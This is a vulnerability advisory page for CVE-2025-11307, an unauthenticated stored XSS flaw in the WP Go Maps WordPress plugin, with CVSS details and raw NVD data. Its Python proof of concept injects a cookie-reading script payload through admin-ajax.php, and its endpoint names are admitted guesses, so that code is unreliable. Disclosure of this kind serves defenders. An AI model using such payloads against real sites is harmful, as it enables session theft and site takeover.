Security Vulnerability Report
中文
CVE-2025-11307 CVSS 8.8 HIGH

CVE-2025-11307

Published: 2025-11-11 06:15:35
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WP Go Maps (formerly WP Google Maps) WordPress plugin before 9.0.48 does not sanitize user input provided via an AJAX action, allowing unauthenticated users to store XSS payloads which are later retrieved from another AJAX call and output unescaped.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP Go Maps (WP Google Maps) < 9.0.48

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-11307 PoC - WP Go Maps Stored XSS # Target: WordPress site with vulnerable WP Go Maps plugin (< 9.0.48) TARGET_URL = "http://target-wordpress-site.com" XSS_PAYLOAD = "<script>alert(document.cookie)</script>" def exploit_stored_xss(): """ Step 1: Inject XSS payload via first AJAX endpoint The plugin does not sanitize user input, allowing arbitrary HTML/JS injection """ inject_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # First AJAX endpoint - inject malicious payload inject_data = { 'action': 'wpgmza_save_map', # Example action, adjust based on actual endpoint 'map_id': '1', 'name': XSS_PAYLOAD, # Unsanitized input stored in database 'other_field': 'malicious_data' } try: response = requests.post(inject_url, data=inject_data, timeout=10) print(f"[+] Payload injection response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Injection failed: {e}") """ Step 2: Trigger XSS via second AJAX endpoint Data is retrieved and output without escaping """ retrieve_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Second AJAX endpoint - retrieve and display stored data retrieve_data = { 'action': 'wpgmza_get_map', # Example action, adjust based on actual endpoint 'map_id': '1' } try: response = requests.get(retrieve_url, params=retrieve_data, timeout=10) if XSS_PAYLOAD in response.text: print("[+] XSS payload found in response - vulnerability confirmed!") print("[+] Payload will execute when page is viewed by any user") else: print("[-] Payload not found - may require different endpoint") except requests.exceptions.RequestException as e: print(f"[-] Retrieval failed: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Testing CVE-2025-11307 on {TARGET_URL}") exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11307", "sourceIdentifier": "[email protected]", "published": "2025-11-11T06:15:34.890", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Go Maps (formerly WP Google Maps) WordPress plugin before 9.0.48 does not sanitize user input provided via an AJAX action, allowing unauthenticated users to store XSS payloads which are later retrieved from another AJAX call and output unescaped."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "references": [{"url": "https://wpscan.com/vulnerability/f5b21a05-7a51-4530-9e07-4700f00eeca3/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.